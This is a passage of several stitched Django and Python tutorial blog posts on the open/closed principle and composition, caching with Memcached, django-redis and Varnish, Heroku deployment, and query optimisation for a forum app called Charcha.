# We now change it to be an instance of SmsClientWithRetry
# As a result, our client developers don't have to change anything
# They are simply importing client from sms.py
client = SmsClientWithRetry(url, username, password)

If you notice, using inheritance, we got ourselves a way to add retry logic without modifying the existing code that is already known to work. This is the crux of the open/closed principle. See Footnotes for a caveat on using inheritance.

Adding Retry Logic

With that done, we can now work on adding the retry logic. We don’t want to retry if our client gave us an invalid phone number or a bad message – because it is a waste of resources. Even if we retried 100 times, it won’t succeed. We also don’t want to retry if there is a logic problem in our module’s code – because our code cannot fix itself magically, and hence, retry is unlikely to help.
In other words, we only want to retry if Watertel has a problem and we believe retrying may end up delivering the message.

If you revisit our original SmsClient implementation, you will now appreciate the way we designed our exceptions. We only want to retry when we get a SmsException. We simply let the client developers deal with all the other exception types.

How do we go about writing the retry loop? The best way to write the retry logic is via a decorator. It's been done so many times in the past that it's best I point you to existing libraries, such as retrying or tenacity.
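That said, here is a rough hand-rolled sketch of the idea, matching the requirement above (first retry immediate, then 2s, then 4s, and only when an SmsException is raised):

import time
from functools import wraps

def retry_sms(max_retries=3):
    """Retry on SmsException with backoff of 0s, 2s, 4s, then give up."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            delay = 0
            for attempt in range(max_retries + 1):
                try:
                    return func(*args, **kwargs)
                except SmsException:
                    if attempt == max_retries:
                        raise  # retries exhausted, let the caller see the error
                    time.sleep(delay)
                    delay = 2 if delay == 0 else delay * 2
        return wrapper
    return decorator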

The open/closed principle, then, tells us not to modify already working code just to add new features. It's okay to change code for bug fixes, but beyond that we should use functional or object-oriented techniques to extend existing code when adding new functionality.
We have now seen how applying the SOLID principles, and the open/closed principle in particular, helped us manage retries in our system.

A Tip: In general, we should prefer composition over inheritance.

Inheritance versus Composition in Python

We will now compare inheritance and composition to find better ways to reuse existing code.

We now have new requirements from our product managers:

To increase the reliability of our SMSes, we would like to add Milio to our SMS providers. To start with, we want to use Milio only for 20% of the SMSes, the remaining should still be sent via Watertel.
Milio doesn't have a username/password. Instead, they provide an access token, and we should add the access token as an HTTP header when we make the POST request.

Of course, like last time around

  1. We do not want to change existing code that is already working.
  2. We need to have the retry logic for Milio as well.
  3. Finally, we do not want to duplicate any code.

Creating an Interface

The first obvious step is to create a new class MilioClient, with the same interface as our original SmsClient. We have covered this before, so we will just write the pseudo-code below.

class MilioClient:
    def __init__(self, url, access_token):
        self.url = url
        self.access_token = access_token
    def send_sms(self, phone_number, message):
        # Similar to send_sms method in SmsClient
        # Difference would be in the implementation of _make_request
        # We will have different JSON response,
        # and different request parameters
        print("Milio Client: Sending Message '%s' to Phone %s"
                 % (message, phone_number))

Some discussion points –

  1. Should MilioClient extend SmsClient? No. Though both are making network calls, there isn’t much commonality. The request parameters are different, the response format is different.
  2. Should MilioClient extend SmsClientWithRetry? Maybe. Here, the retry logic is reusable and common between the two. We can reuse that logic using inheritance, but it isn’t the right way to reuse. We will discuss this a little later in this post.

Inheritance versus Composition

The reason we can't inherit from SmsClientWithRetry is that its constructor expects a username and password, which we don't have for Milio. This conflict exists largely because we made a mistake in the earlier chapter: we chose to build the new logic using inheritance. Better late than never; we will refactor our code, and this time we will use composition instead of inheritance.

# We rename SmsClient to WatertelSmsClient
# This makes the intent of the class clear
# We don't change anything else in the class
class WatertelSmsClient(object):
    def send_sms(self, phone_number, message):
        ...

# This is our new class to send sms using Milio's API
class MilioSmsClient(object):
    def send_sms(self, phone_number, message):
        ...

class SmsClientWithRetry(object):
    def __init__(self, sms_client):
        self.delegate = sms_client

    def send_sms(self, phone_number, message):
        # Insert start of retry loop
        self.delegate.send_sms(phone_number, message)
        # Insert end of retry loop

_watertel_client = WatertelSmsClient(url, username, password)
# Here, we are passing _watertel_client
# But we could pass an object of MilioSmsClient,
# and that would still give us retry behaviour
sms_client = SmsClientWithRetry(_watertel_client)

The logic to Split Traffic

Now let’s look at the next requirement – how do we split the traffic between the two implementations?
The logic is actually simple. Generate a random number between 1 and 100. If it is between 1 and 80, use WatertelSmsClient. If it is between 81 and 100, use MilioSmsClient. Since the number is random, over time we will get an 80/20 split between the implementations.

Introducing a Router class

Now that we have retry logic for Milio in place, let’s face the elephant in the room – where should we put this logic? We cannot change the existing client implementations. And of course, we can’t put this logic in MilioSmsClient or WatertelSmsClient – that logic doesn’t belong there.
The only way out is one more indirection. We create an intermediate class that is used by all existing clients. This class decides to split the logic between MilioSmsClient and WatertelSmsClient. Let’s call this class SmsRouter.

class SmsRouter:
    def send_sms(self, phone_number, message):
        # Generate a random number between 1 and 100
        # Between 1-80? Call send_sms on WatertelSmsClient
        # Between 81-100? Call send_sms on MilioSmsClient
        pass

Providing Concrete Implementations to SmsRouter

Our SmsRouter needs instances of WatertelSmsClient and MilioSmsClient. The easiest way is for SmsRouter to create the objects in its constructor.

class SmsRouter:
    def __init__(self, milio_url, milio_access_token,
                       watertel_url, watertel_username, watertel_password):
        self.milio = MilioSmsClient(milio_url, milio_access_token)
        self.watertel = WatertelSmsClient(watertel_url, watertel_username, watertel_password)

If you feel the code is ugly, you are not alone. But why is it ugly?
We are passing five parameters to the constructor and constructing objects inside it. If those classes ever require new parameters, our constructor will have to change as well.
To remove this ugliness, we pass fully constructed objects to SmsRouter, like this:

class SmsRouter:
    def __init__(self, milio, watertel):
        self.milio = milio
        self.watertel = watertel

Okay, this is a lot better, but it’s still not great. Our SmsRouter has hard coded percentages for each of the clients. We can do better.

class SmsRouter:
    def __init__(self, milio, milio_percentage, watertel, watertel_percentage):
        self.milio = milio
        self.milio_percentage = milio_percentage
        self.watertel = watertel
        self.watertel_percentage = watertel_percentage

Eeks. We are back up to four parameters. Again, why is this ugly? SmsRouter doesn't really care about the difference between milio and watertel, but it still has variables with those names.

Generalizing SmsRouter

Let’s generalize it by passing a list of sms providers.

from random import randint

class SmsRouter:
    def __init__(self, providers):
        '''providers is a list of tuples, each tuple having a provider and a percentage
           providers = [(watertel, 80), (milio, 20)]'''
        self.providers = providers

    def _pick_provider(self):
        # Pick a provider on the basis of the percentages provided
        # For now, we will just pick one at random
        return self.providers[randint(0, 1)][0]

    def send_sms(self, phone_number, message):
        provider = self._pick_provider()
        provider.send_sms(phone_number, message)

With this version of SmsRouter, we can plug in multiple implementations, and the router will delegate to the right provider.
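If we later want _pick_provider to actually honour the percentages, a small sketch using random.choices (available in Python 3.6+) would do:

from random import choices

def _pick_provider(self):
    # Weight each provider by its configured percentage
    providers = [provider for provider, _ in self.providers]
    weights = [percentage for _, percentage in self.providers]
    return choices(providers, weights=weights, k=1)[0]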

Using our SmsRouter

This is how we can now use the router:

# First, create the concrete implementations
watertel = WatertelSmsClient("https://watertel.example.com", "username", "password")
milio = MilioSmsClient("https://milio.example.com", "secret_access_token")
# Create a router with an 80/20 split
sms = SmsRouter([(watertel, 80), (milio, 20)])
# Calling the send_sms in a loop will on an average
# send the messages using the percentages provided
for x in range(1, 10):
    sms.send_sms("99866%s" % (x * 5, ), "Test message %s" % x)


So why composition over inheritance?

Object composition has another effect on system design. Favoring object composition over inheritance helps you keep each class encapsulated and focused on one task. Your classes and class hierarchies will be small and will be less likely to grow into unmanageable monsters.

Also, we were able to add additional functionality without modifying the existing code. This is an example of composition – wrapping existing functionality in powerful ways.

 Download E-Book

In this post, we will go through how to assess which cache to use and how to use it. The main inspiration for this post was introducing a caching mechanism in the Charcha discussion forum. The source code for Charcha is available here.

Why is this required?

Caching is one of the most useful techniques developers use to improve application performance. Most sites have to serve multiple clients, and for obvious reasons your application may have to show different data or templates to different clients based on your use-case.

Let's take an example to explain this better. Say you are an admin of Charcha, authorized to see all the comments and votes on all the blogs. Now say a new user comes along, authorized only to see the blog and the top comment. With this logic, your server has to make separate database queries and generate different templates based on authorization (let's just call it permissions from now on).

Now, this is just a simple example using Charcha; at larger scale, such cases are really common. For a high-traffic website, you would basically be asking your server to handle X requests, performing N queries each, to generate Y templates. We can all agree that for high-traffic sites the overhead can be pretty overwhelming. To counter this, we introduce caching.

What caching does is remove the burden of running the same queries again and again; it simply stores the result and sends it directly to the client. This all sounds like pure upside, but caching does have its share of drawbacks.

Django already comes with a cache system that lets you save pages, but that's not all: Django provides different levels of cache granularity. In this blog, we will discuss which cache system is best suited for us, and weigh the advantages and disadvantages of each. Let's divide the caches we could use by those levels of granularity.

Do note that Charcha might not really need a cache at all if the maintenance cost is high. We have already introduced some caching, which was covered in one of our earlier posts.

Setting up Cache in Django

Setting up a cache in Django is exceedingly easy. All we have to do is define in our settings.py (or common.py in Charcha) what type of caching we want, how long entries will live, and where they will be stored.
Let's go through the levels of cache granularity that Django provides.

1. Caching Database

Django gives us the ability to save cached data in our database. This works swimmingly if we have a well-indexed database.
To set it up, all we have to do is create the cache database table, as shown below:

$ python manage.py createcachetable 

This creates the table in the configuration your Django app expects. Now all we have to do is set the backend in our cache preferences and point the location at the database table.

CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
        'LOCATION': 'cache_data_table',
    }
}

And we are done. This backend is not as effective as the others and would probably require a lot of adjustments once we start using a lot of tables. Since there are better options available, we are going to have a look at those.

2. Using Memcached

One of the most popular and efficient types of cache supported natively by Django is Memcached. As the name suggests, Memcached is a memory-based cache server. It can dramatically reduce the number of database queries a server has to make and significantly increase the performance of an application.

Generally, database calls are fast but not fast enough, since a query takes CPU resources to process and data is (usually) retrieved from disk. An in-memory cache like Memcached, on the other hand, takes very little CPU and serves data directly from memory. It does not use a query-like structure like SQL; Memcached uses key-value pairs to fetch data, so for obvious reasons you go from a complexity of O(n) or O(n^2) down to O(1).

There are a few ways to use Memcached. You could install it yourself (if you don’t already have it) using the commands below:

# Install on Debian and Ubuntu
$apt-get install memcached
# Install on Mac OS X (with Homebrew)
$brew install memcached

Once you have Memcached installed, it is pretty easy to use. All we have to do is point to it in settings.py and we are done.

CACHES = {
    'default':{
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': '127.0.0.1:11211',
    }
}

One of the most popular features of Memcached is its ability to share a cache over multiple servers. That means we can run Memcached daemons on multiple machines, and the program will treat the group of machines as a single cache. How?

CACHES = {
    'default':{
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': ['172.19.26.240:11211', '172.19.26.242:11211'],
    }
}

We can also check the behavior of our cache from a Django shell:

from django.core.cache import cache

cache.set('hello', 'world')
cache.get('hello')  # returns 'world'

It feels like we have been going over how great Memcached is, but it has one huge disadvantage: since it lives entirely in memory, if the server crashes you lose all the cached data along with it. You basically go down with your server, and restarting the server means starting Memcached from a clean slate.

3. Using Django-redis

It’s worth noting that Redis holds many advantages over Memcached, the main trade-off being that Redis operates at a lower level of granularity. Redis offers clustering, and unlike Memcached, that support is provided out-of-the-box. Being built in makes for a more robust solution that is easier to administer. It is also exceedingly fast and easy to use, and it relies on the same key-value model as its opponent, so it is not going to be difficult to understand. Overall, I feel that neither of these caching systems holds that big a performance improvement over the other, so it comes down to how comfortable you are with each of the two systems.

Personally, I like Redis more, as it is easier to set up and gives us a wider range of possibilities. The areas where Redis wins over its opponents are data persistence, restore, and high availability. This might not really matter unless your data is important.

So let us download Redis and see it in action. You can install Redis using the commands below:

$ wget http://download.redis.io/redis-stable.tar.gz
$ tar xvzf redis-stable.tar.gz
$ cd redis-stable
$ make

Let us run the server now using:

$ redis-server

Redis also provides us with an awesome CLI. We can get into this CLI and watch all the keys that are getting stored as well.

$ redis-cli ping
PONG

One of the ways Django can be integrated with Redis is through django-redis, which executes Django’s cache commands against Redis. We can install django-redis using:

pip install django-redis

django-redis is also easy to include, as all we have to do is add it to our settings.py. Do note that Redis by default runs on port 6379, so that is the location we point django-redis at in our settings.py.

CACHES = {
    'default':{
        'BACKEND': 'django_redis.cache.RedisCache',
        'LOCATION': 'redis://127.0.0.1:6379/1',
        'OPTIONS': {
            'CLIENT_CLASS': 'django_redis.client.DefaultClient',
        },
        'KEY_PREFIX': 'example'
    }
}

Charcha does not have a big overhead, so adding django-redis might seem a bit like overkill (as did Memcached), but for implementation purposes, and for heavier-traffic sites, we want to give you an example of how to use django-redis.
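With the backend above configured, the regular Django cache API transparently talks to Redis. A quick sketch (the key names are made up for illustration; cache.get_or_set is available from Django 1.9 onwards):

from django.core.cache import cache

# With the django-redis backend configured, these calls hit Redis.
cache.set('post:1:score', 42, timeout=300)   # expires after 5 minutes
print(cache.get('post:1:score'))             # -> 42

# get_or_set computes and stores the value only on a cache miss.
score = cache.get_or_set('post:2:score', lambda: 0, timeout=300)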

Let’s try seeing how well our application runs when we make a lot of requests at the same time. We can use loadtest here to make concurrent calls and assess the performance of django-redis.

$ loadtest -n 100 -k http://localhost:9000/discuss/1/
Before django-redis in loadtest

So the total time taken to load is about 7 seconds. This is pretty commendable, but it can be optimized a bit further. We need to start analyzing why it takes this long and which views are getting called. For this, we will use django-debug-toolbar.

When we look at what the code is doing, we can decide how to make changes to improve the performance. I can see that a lot of identical queries are happening for the same requests. All I have to do is add:

from django.views.decorators.cache import cache_page

url(r'^discuss/(?P<post_id>\d+)/$', cache_page(5*60)(views.DiscussionView.as_view()), name="discussion"),

and reap all the benefits of django-redis. You can see the output below for yourself. Stand back, ladies and gentlemen, benchmarking is happening.

After django-redis in loadtest

Yup, that’s right. We have achieved a response time of about 2 seconds. The overhead is not that much, so whether to use django-redis here is a call we need to take.

4. Using Varnish

Varnish is a caching HTTP reverse proxy. It always sits in front of your web server, be it Apache or Nginx, and it works by caching your static pages. The catch with Varnish is that it cannot cache dynamic content. If your site is not very dynamic you can make good use of Varnish, but you should always check which views can be cached and then cache them. Second, identify how long a delay you can tolerate for someone seeing stale content. The best thing about Django and Varnish is how well they fit together.
Setting up Varnish is also really easy to do:

# Install on Debian and Ubuntu
$ apt-get install varnish
# Install on Mac OS X (with Homebrew)
$ brew install varnish

Let’s take a page and see its performance and how it is working (for this we will take the discussion page).

Before Varnish

How will Varnish help? What does it do? Basically, Varnish is going to sit between your Django application and your users. All we have to do now is add the cache_page decorator to our view: the decorator sets the Cache-Control headers on the response, and Varnish honors them and does everything else for us. Let’s try applying it to upvote_post and see what happens.

from django.views.decorators.cache import cache_page
@cache_page(60)
def upvote_post(request, post_id):
	...
After Varnish

What just happened? Well, Varnish was waiting for the response from upvote_post, and when you made a server call to the function, it held on to the response. The next time we made the call, Varnish just sent back the response without going to the server view again.
To be more secure we could add a cookie header to the request, so we would have some security at this level as well.
This entire implementation is what is called per-view caching. In layman’s terms, we are storing/caching the responses from each view individually.
Varnish also has its own configuration language, VCL, which can be used for normalization in places where the endpoints do not differ based on the user’s authentication. How?

sub vcl_recv {
	// Urls can be stripped of all the cookies
	if(req.url == "/" || req.url ~ "^/comments/") {
		unset req.http.Cookie;
	}
}

We can go ahead with Varnish for now and at least start caching the views. Varnish has a lot of documentation, and I urge you to read up on it.

Summary

Caching, as previously mentioned, is a way of reducing server load and improving the performance of your application. Although most caches assiduously keep working to reduce the dependency on your server, one must always keep in mind the overhead of the cache itself as well.

Charcha might not require as many levels of caching as high-traffic sites do. If, for example, Charcha became something like Stack Overflow, we could start adding caches to reduce server response times: something like Redis/django-redis as a store for objects and the results of DB queries, and Varnish for serving our static pages. It really depends on your use-case and what you require your cache to do.

For now, in Charcha, the previous implementation for caching as mentioned in our previous post would do just fine.

This article is part of our blog series on Django development, where we explore ways to deploy Django apps to Heroku. We have built a Django application named Charcha, and now let us see the required steps to deploy this application to Heroku.

 

Install Heroku CLI

Sign up for an account on Heroku, then follow this link to install Heroku CLI.
Once the CLI is set up, log in from your terminal using the following command:

$ heroku login
Enter your Heroku credentials.
Email: devashish@hashedin.com
Password (typing will be hidden):
Authentication successful.

Configuring the application for Heroku

Heroku web applications require a Procfile. This file declares the application’s process types and entry points, and it must be located in the root of the repository. Here is the content of the Procfile that we will use:

web: gunicorn charcha.wsgi

This requires Gunicorn, a production-grade web server commonly used for Django applications.

Installing gunicorn

$ pip install gunicorn
$ pip freeze > requirements.txt

Database Configuration

For this, we use the dj-database-url library to extract database configurations from the environment.
For Django applications, a Heroku Postgres hobby-dev database is automatically provisioned. This populates the DATABASE_URL environment variable.

To set up the database, we will add the following code in settings.py:

# Update database configuration with $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config()
DATABASES['default'].update(db_from_env)

Static assets management and serving

Configure the static directories in settings.py:

# https://docs.djangoproject.com/en/1.9/howto/static-files/
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
    os.path.join(PROJECT_ROOT, 'static'),
)

By default, Django does not serve static files in production. Hence, we will use WhiteNoise for serving static assets in production.

 

Installing Whitenoise

$ pip install whitenoise
$ pip freeze > requirements.txt

settings.py

STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'

wsgi.py

from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
application = get_wsgi_application()
application = DjangoWhiteNoise(application)

Building the app locally

Run the following command to test Heroku deployment locally.

$ heroku local web

This will run the Procfile, so you can debug any errors on your local machine.

Deploy to Heroku

Finally, we are now ready to deploy our application. Follow these steps to successfully deploy to Heroku.
Commit all changes to git.

$ git add .
$ git commit -m "Added a Procfile."

 

Login to Heroku

$ heroku login
Enter your Heroku credentials.
...

 

Create an app. Let’s name the app “charcha”. Heroku will create a random app name if none is provided.

$ heroku create charcha

 

Push to Heroku remote

$ git push heroku master

After the app is deployed, use this command to open the app in your browser:

$ heroku open

Summary

We have learned how to configure our application to deploy easily on Heroku. We have also learned about dj-database-url for setting up the database and WhiteNoise for serving static files in production.

This is the seventh post in the Django blog series. In this post we will learn how to optimize a Django application’s performance. The inspiration for this post has mainly been the performance improvement of the Charcha Discussion Forum. The source code for the Charcha forum is available here.

For this post, like all preceding posts in this series, we are going to use Charcha’s codebase as an example and try to optimize its pages from there on out. Also, as the scope for optimization is exceedingly wide, we will tackle the domains one by one. The main focus will be on attaining maximum efficiency in the backend (as it is a Django application at the end of the day), and measurement will be done through django-debug-toolbar.

The way we are going to proceed is by looking at the performance of the application and seeing where we can optimize it, domain by domain. To assess the site we will use a bunch of tools, the most important ones being django-debug-toolbar and Chrome’s network tab. We are going to hit the front-end portion first and move forward from there.

Optimizing the Front-end:

Typically, when you are looking to optimize an application on the front-end, you should look at the entire stack to understand how your app is working. This approach should always be followed, as it gives you a better perspective on how things are functioning.

Charcha uses server-side rendering instead of client-side rendering. This on its own solves a lot of problems for us. How? With client-side rendering, your request loads the page markup, its CSS, and its JavaScript; the problem is that all the content is not loaded at once. Instead, the JavaScript loads first, then makes another request, gets a response, and generates the required HTML. With server-side rendering, your initial request loads the page, layout, CSS, JavaScript, and content all at once. Basically, the server does everything for you.

The moment I learned that Charcha renders its templates on the server, my focus turned towards caching and minification of the pages (to be honest, these should be present in all applications).

Caching Approach:

Before we start writing any code, I want you to understand how caching works with server-side rendering and how powerful it really is. As you may know, whenever an endpoint returns data, that data can generally be cached. So the main question is: can we cache HTML? Yes, by rendering on the server we can easily cache our responses.

So what’s going to happen is that the first time your client gets a response, that response is cached; the next time the same request is made, the server does not have to regenerate it. Now that we have an approach for caching, we can start implementing it. For this caching we are going to use WhiteNoise. To integrate WhiteNoise in our Django app, we just have to follow these steps:

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
MIDDLEWARE_CLASSES = [
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',
    ...
]

Now WhiteNoise is going to start serving all your static files, but our main purpose, caching, is still not done. One thing to note here is that WhiteNoise also supports compression, which we can use.

# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATIC_HOST = os.environ.get('DJANGO_STATIC_HOST', '')
STATIC_URL = STATIC_HOST + '/static/'
INSTALLED_APPS = [
    ...
    # Disable Django's own staticfiles handling in favour of WhiteNoise, for
    # greater consistency between gunicorn and `./manage.py runserver`. See:
    # http://whitenoise.evans.io/en/stable/django.html#using-whitenoise-in-development
    'whitenoise.runserver_nostatic',
    'django.contrib.staticfiles',
    ...
]
def cache_images_forever(headers, path, url):
    """Force images to be cached forever"""
    tokens = path.split(".")
    if len(tokens) > 1:
        extension = tokens[-1].lower()
        if extension in ('png', 'jpg', 'jpeg', 'ico', 'gif'):
            headers['Cache-Control'] = 'public, max-age=315360000'
WHITENOISE_ADD_HEADERS_FUNCTION = cache_images_forever

Now our caching for the front-end is complete. Let’s move on to the second phase of front-end optimization and try to minify our files.

Minifying the Files:

For minifying our files we are going to use the spaceless template tag. Although this will not minify our files per se, it is still going to give us a better result, as it helps reduce our page weight. How? Well, the spaceless template tag removes whitespace between HTML tags, including tab characters and newlines. This is really easy to implement in Django templates: all we need to do is add spaceless and close it with endspaceless in our base.html. As base.html is used everywhere as the basic skeleton, we can be sure it will be applied to all the other templates that extend it as well.
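As an illustration, a trimmed-down base.html wrapped in the tag might look like this (the blocks shown are placeholders, not Charcha’s actual template):

{% spaceless %}
<html>
  <head>
    <title>{% block title %}Charcha{% endblock %}</title>
  </head>
  <body>
    {% block content %}{% endblock %}
  </body>
</html>
{% endspaceless %}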

Now that we are done with our front-end optimization let’s move to our back-end. This is perhaps the one place where we would be able to achieve the maximum amount of efficiency.

Optimizing the Back-end:

Ideally, the flow for optimizing your code is to move from your queries to how your Django application is functioning. For queries, we need to look at the number of queries, the amount of time each takes to execute, and how our Django ORM queries are working. Internally Django already does a lot for us, but we can optimize its queries even further.
We need to start scavenging the code and check the total number of query calls per page. There are a few ways to do this, the most obvious one being logging all the queries to sql.log and reading the queries from there. Another way of accomplishing this is by using django-debug-toolbar.

Now, django-debug-toolbar is a really powerful tool and extremely easy to use. It helps in debugging responses and provides us with a bunch of configurable panels. We are mainly going to use it to see how quick our queries are and whether we are performing any redundant queries.

Django Debug Toolbar

So let’s first integrate the toolbar into Charcha. To install django-debug-toolbar we are going to follow this doc. It’s pretty straightforward and easy to implement. First we need to install the package using pip.

 $ pip install django-debug-toolbar

One thing to note here is that if you are using a virtualenv, avoid using sudo; ideally we should not need sudo at all inside a virtualenv. Now that django-debug-toolbar is installed, we need to add debug_toolbar to INSTALLED_APPS in our settings.py.

INSTALLED_APPS = [
    ...
    'django.contrib.staticfiles',
    ...
    'debug_toolbar',
    ...
]

Now we need to put the debug toolbar in our middleware. Since the django-debug-toolbar middleware has no strict position in the middleware stack, we can add it wherever we see fit.

MIDDLEWARE = [
    # ...
    'debug_toolbar.middleware.DebugToolbarMiddleware',
    # ...
]

Now we need to add the URL to configure the toolbar. We just need to add the URL under DEBUG mode; the rest django-debug-toolbar will take care of on its own.

from django.conf import settings
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        url(r'^__debug__/', include(debug_toolbar.urls)),
    ] + urlpatterns

There are also a few configuration options we could use, but for now we are going to leave the defaults, as they are not required (with the correct version this should be done automatically).

DEBUG_TOOLBAR_PATCH_SETTINGS = False

Also, since we are working locally, we need to set the following INTERNAL_IPS for django-debug-toolbar to pick up our requests.

INTERNAL_IPS = ('127.0.0.1',)

And now we test. Mostly our screen would look something like the image below.

Django Debug Toolbar in action

We can now start checking the number of queries that are being run and how much time they are taking to execute as well.

This part is actually a bit easy, as all we have to do is set a benchmark on the basis of the amount of data we have. We also need to consider scale: if we have a lot of data behind a lot of foreign keys, we might need to start using indexes there.

To show how we are going to refactor the code, we went ahead and looked at the performance of all the pages. Most of the refactoring looks at how we can reduce the number of queries. As an example we are going to look at the discussion page.

Django Debug Toolbar in the discussion page

Now, according to django-debug-toolbar, we are making 8 queries whenever we make the call to see the post. This would later start giving us problems if we don’t eliminate a few of them. We are going to approach optimizing the queries in the following subparts:

Solving N+1 queries:

We can solve the problem of N+1 queries simply by using prefetch_related and select_related in Charcha. With these two functions we can get a tremendous performance boost as well. But first, we need to understand what exactly they do and how we can implement them in Charcha.

select_related should be used when the object you are selecting is a single object of a model, so something like a ForeignKey or a OneToOneField. Whenever you make such a call, select_related does a join of the two tables and sends back the result to you, thereby saving an extra query to the ForeignKey table.
Let’s see an example to better understand how we can integrate this in Charcha.
We are going to take the example of the Post model which looks something like this:

class Post(Votable):
    ...
    objects = PostsManager()
    title = models.CharField(max_length=120)
    url = models.URLField(blank=True)
    text = models.TextField(blank=True, max_length=8192)
    submission_time = models.DateTimeField(auto_now_add=True)
    num_comments = models.IntegerField(default=0)
    ...

Do note that we have a custom manager defined, so whichever query we need to execute, we can define it in our manager. At first glance you can see that our Post class inherits from Votable, so we now need to see what is happening in that class.

class Votable(models.Model):
    ...
    votes = GenericRelation(Vote)
    author = models.ForeignKey(User, on_delete=models.PROTECT)
    ....

Whenever we check the author of our Post, we make an extra call to the database. So now we go to our custom manager and change the way we are fetching the data.

class PostsManager(models.Manager):
    def get_post_with_my_votes(self, post_id, user):
        post = Post.objects\
            .annotate(score=F('upvotes') - F('downvotes'))\
            .get(pk=post_id)
        ...
        return post

If we use django-debug-toolbar, we can see that whenever we make a call like get_post_with_my_votes().author, we execute an extra query against the User table.

Before select_related

This is not required and can be rectified easily by using select_related. What do we have to do? Just add select_related to the query.

class PostsManager(models.Manager):
    def get_post_with_my_votes(self, post_id, user):
        post = Post.objects\
            .annotate(score=F('upvotes') - F('downvotes'))\
            .select_related('author').get(pk=post_id)
        ...
        return post

And that’s it. Our redundant query is gone. Let’s check it using django-debug-toolbar.

After select_related

We can use prefetch_related when we are going to get a set of things, so basically something like a ManyToManyField or a reverse ForeignKey. How does this help? prefetch_related makes a separate query for the related objects and joins the results in Python, instead of bloating the original query with redundant columns. This is not really required in Charcha as of now, so we are going to let it be, but here is roughly what it would look like.
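A sketch, assuming the votes GenericRelation from the Votable model above:

# Two queries in total: one for the posts, one for all their votes.
posts = Post.objects.prefetch_related('votes')
for post in posts:
    votes = post.votes.all()  # served from the prefetch cache, no extra query
    print(post.title, len(votes))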

Query in a loop:

Though this is not done anywhere in Charcha, it is a practice a lot of people follow without realizing its impact. Although it seems pretty basic, I still feel it deserves its own section.

post_ids = Post.objects.values_list('id', flat=True)
authors = []
for post_id in post_ids:
    # Disaster: with a lot of post_ids, say around 10,000,
    # we would be making that many calls, basically (n+1) queries.
    post = Post.objects.get(id=post_id)
    authors.append(post.author)

The above example is just a sample of how disastrous a query in a loop can be for a large dataset, and it can easily be solved by the previous discussion (on select_related and prefetch_related), as the sketch below shows.
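A sketch of the fix, using the author foreign key we met earlier; select_related turns the loop into a single JOINed query:

# One query instead of (n+1): the JOIN pulls the authors along.
posts = Post.objects.select_related('author')
authors = [post.author for post in posts]  # no queries inside the loop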

Denormalization:

I recommend using denormalization only when we actually have performance issues, not as premature optimization. We should check the queries before we start denormalizing, as it makes no sense to keep adding complexity if it is not impacting our performance.

The best place to explain a denormalization implementation in Charcha is the Votable model, as done in the 2nd blog of this series. Why the Votable table? Because we want to show the score, i.e. upvotes minus downvotes, and the comments on the home page. We could make a join on the Votable table and compute it from there, but that would slow down our system. Instead, we add the fields upvotes, downvotes, and flags to the Votable model. This in turn reduces our calls.

class Votable(models.Model):
    ...
    upvotes = models.IntegerField(default=0)
    downvotes = models.IntegerField(default=0)
    flags = models.IntegerField(default=0)
    ...

Now we can just inherit these properties in whichever models we require and move forward from there. Although this seems pretty easy to implement, it does have a drawback: every time a change is made, we have to update these fields. So instead of making a JOIN we now have a more complex UPDATE.

WBS for Tracking Comments Hierarchy

This is also a form of denormalization. Each comment needs a reference to its parent comment and so on, so it basically forms something like a tree structure.

class Comment(Votable):
    ...
    wbs = models.CharField(max_length=30)
    ...

The problem here is that self-referential queries are exceedingly slow. So we refactor this approach and add a new field called wbs, which helps us track the comments as a tree. How does it work? Every comment gets a code, which is a dotted path. The first top-level comment gets the code “.0001” and the second top-level comment gets “.0002”, and so on. If someone responds to the first comment, the reply gets the code “.0001.0001”. This helps us avoid self-referential queries and use wbs instead.
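To see how this plays out, here is a minimal sketch; next_child_wbs is our own illustrative helper (not Charcha’s exact implementation), and we assume a post foreign key on Comment:

def next_child_wbs(parent_wbs, existing_children):
    # ".0001" -> ".0001.0001" for the first reply, ".0001.0002" for the second, ...
    # For a top-level comment, parent_wbs is the empty string.
    return "%s.%04d" % (parent_wbs, existing_children + 1)

# The whole comment tree for a post, in display order, in one query:
comments = Comment.objects.filter(post_id=post_id).order_by('wbs')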

Now, the limitation of this field is that we can only allow 9999 comments at each level, and the height of the wbs tree can only go up to 6 levels, which is acceptable in our case. But when going through a large database, we would have to index this field as well. We discuss this in the next section.

Adding Indexes

Indexes are one of the standard DB optimization techniques, and Django provides us with the tools to add them. Once we have identified which queries are taking a long time, we can use Field.db_index or Meta.index_together to add indexes from Django.

Before we start adding indexes, we need to identify where to add them, and for that we will use django-debug-toolbar to see how fast we get our responses. We are going to look at the post page from before and track its queries, and select a query that we can easily optimize with indexes (given below).

Before indexes
SELECT ••• FROM "votes" WHERE ("votes"."type_of_vote" IN ('1', '2') AND "votes"."voter_id" = '2' AND "votes"."content_type_id" = '7' AND "votes"."object_id" = '1')

This particular query is taking 1.45s to execute. All we have to see is the table and which fields we could add the index on. Since this query belongs to the Vote model, we are going to add the index on content_type_id and object_id. How?

class Vote(models.Model):
    class Meta:
        db_table = "votes"
        index_together = [
            ["content_type", "object_id"],
        ]

And that’s all we have to do. Now we run our migrations and check our performance.

After indexes

Now, this query is taking only 0.4 seconds to execute and that is how easy it is to implement indexes.

Django QuerySets are LAZY

One thing to note when using Django is that Django querysets are lazy, which means a queryset does not do any database activity on its own; Django only runs the query when the queryset is evaluated. So if we build a query on the Post model like

q = Post.objects.filter(...)
q = q.exclude(...)
